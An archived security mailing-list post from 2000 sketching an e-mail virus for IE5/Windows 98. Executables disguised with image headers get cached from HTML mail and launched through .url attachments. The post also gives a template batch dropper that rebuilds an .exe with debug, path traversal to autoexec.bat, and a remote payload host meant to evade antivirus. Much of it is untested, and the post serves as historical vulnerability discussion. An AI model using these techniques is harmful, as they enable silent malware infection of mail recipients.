OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: UPDATE on possible new "e-mail virus" concept ?
From: Zoa_Chien (zoa_chienINAME.COM)
Date: Fri May 19 2000 - 16:01:37 CDT

Update:

Tested OK so far:
-------------------------

- saving VALID .com and .batch files without the user being prompted in the
temp inet files dir with their original names.
- creating executable files with debug.

- Not tested yet: (not possible ?)
-----------------------

- saving the files in a random directory using "../filename.exe"

- New ideas.
------------------

- If changing directories is not possible, could it be possible to send
someone an e-mail with a image source : http://www.server.com/virus.com
(with that virus.com being a com file that starts with BM) and enclose a
.url file as an attachement that points to file:///c:/temp-inet-files/virus.com
(Using a link in the HTML code will not work as it will ask prompt you for
a download dir)

I noticed that .url files will work exactly like .lnk files if made properly.

That means that if you double click on them in win98, no warnings will be
given, and the file will execute (if its on you local HD).

- the remote server with the virus on it, could change its version very
frequently to avoid recognition by virus scanners and no virus code will be
in the attachement itself.

- This way, it could be possible to bypass mail scanners, i don't think
they scan image files.
this could be different if the extension is .com off course.
  How do most AV scanners work ? do they check the attachements ? or do
they monitor the creation of new files in general ?

- I think the new microsoft patch makes sure that .vbs files send to you as
an attachement can't be run just by clicking on them, but what if those
files already exist on your HD ? And we only point to those files in our
attachement ?
Will it disallow us to run those files too ?

Remember that setting outlook security settings for Internet Zone and
Restricted Sites Zone will be bypassed too coz the files are already
located on your very own hard disk the moment you preview te e-mail message.

- How about using .lnk / .chm files ?

- btw: for those that are interested :
renaming a .exe file to any of the folowing extensions will still be
executed in NT if double clicked upon:

.scr
.bat
.pif
.lnk
.com
.exe
.cmd

These filetypes can be used to point to other files:

.url
.lnk
.pif

Do you know of any other ?

Zoa_Chien.

>Alternative approach for writing e-mail virusses.??
>--------------------------------------------------------------------
>
>Disclaimer:
>-----------
>
>Not of this got tested, and chances are big that not everything will function.
>Everything i wrote is purely hypothetical, but i guess some ideas might be
>usefull to know.
>(Please e-mail me if you did some testing on this, i don't have the time to
>test this myself.... (exams))
>
>Background: (Skip this if you don't have the time)
>-----------------
>
>While looking for a way to bypass the Internet Explorer (I.E.) Security
>setting that disables all downloads a while ago, i noticed that I.E.
>automatically downloads image files, (unless you have images disabled)
>and stores them in the "temporary internet files" folder.
>
>I did some testing on how I.E.(IE5, win98) handles those image files and found
>that it downloads the first few bytes, checks for a valid image file header
>and if the header is present, it will download the rest of the file.
>And when the complete file is downloaded it will try to show the image.
>
>So, I took a Executable file, and changed the first 2 bytes
>(MZ) to BM with a hex editor (or edit.com /b) and then inserted this filename
>(renamed to file.bmp) as image source in a HTML page.
>
>When opening this page in I.E., the complete file got downloaded (I.E. assumed
>this was a .BMP file), however it showed a red cross in I.E. like the ones
>you get with image not found.
>If i changed the BM back to MZ and renamed it back to file.exe I was able to
>run this program, i even did a binary file compare and it was exactly the
>same as the original one. (so no stripping occured.)
>
>(I noticed that in NT4 things are different, since the temporary internet
>files
>located in /winnt/profiles/admin/Local settings/ is a special directory type,
>could someone give me more info on this type of dir ?)
>I guess similar things will occur in other web browsers.
>
>--
>
>Virus concept: (not tested)
>--------------
>
>Meanwhile, i noticed that the image files for I.E. don't need to have a valid
>image file extension, anything will work fine. (and IE uses temporary files
>with
>the same name as the original files.)
>
>So, why not send someone a virus.bat file, as image in a HTML mail. The first
>2 bytes in the .bat file should be BM (or any other image file header).
>We all know that when an error occures in a .bat file all it will do is say:
>bad command or file name and will continu with the next line, so writing this
>BM in the beginning won't hurt.
>
>Hmmm.. lets see: what can i do with .bat files... pretty much, but i prefer
>.exe files.
>Not a problem: with debug.exe i can dump executable files as hex in an
>ascii file, and back to .exe.
>So, in the .bat file i will use some ECHO commands >> filehex.txt to create
>the hex file.
>Next line in the .bat file should contain the command line parameters for
>debug to create this .exe file.
>And the last line should execute this .exe file.
>
>Example of how the .bat file should look:
>
>-BOF-
>BMdfjlqskdfjlksjdflksqjdflksjcvlvksjd (this will cause error, but who cares)
>ECHO 22 EF SD E3 FE AD >> filehex.txt (should append not overwrite)
>ECHO 1D A6 E6 .... >> filehex.txt
>...
>debug -xxxxx filehex.txt file.exe (i don't remember the correct parameters)
>file.exe
>-EOF-
>
>Of course, we would like this batch file to get executed automatically.
>
>This was not tested, but i think it might be possible to make a custom
>HTTP server that thinks "/../../../../../../file.bat" (or maybe "c:\file.bat")
>is valid, and when asked to send this file, it will not try to look in lower
>dirs to find the file, but simply will upload the file to the client.
>
>(I could use some %codes in the filename in the .html to scramble the dir and
>fool I.E.)
>That way, we might be able to save the temporary files in other dirs then
>"the temporary internet files" folder.
>
>If we are able to save the filename as c:\autoexec.bat we could let the file
>execute on the next bootup.
>
>Enjoy!
>
>final note: maybe it is possible to create valid .com files with a valid
>image file header.
>(from good ol' times, i remember it was possible to give a .com file a "PK"
>as first 2 bytes of the file, thus avoiding getting scanned, just check
>the ASM meaning of the image file headers.)
>
>
>
>Zoa_Chien (zoa_chieniname.com)
>
>-
>Vanheuverzwijn Joachim
>www.securax.org
>-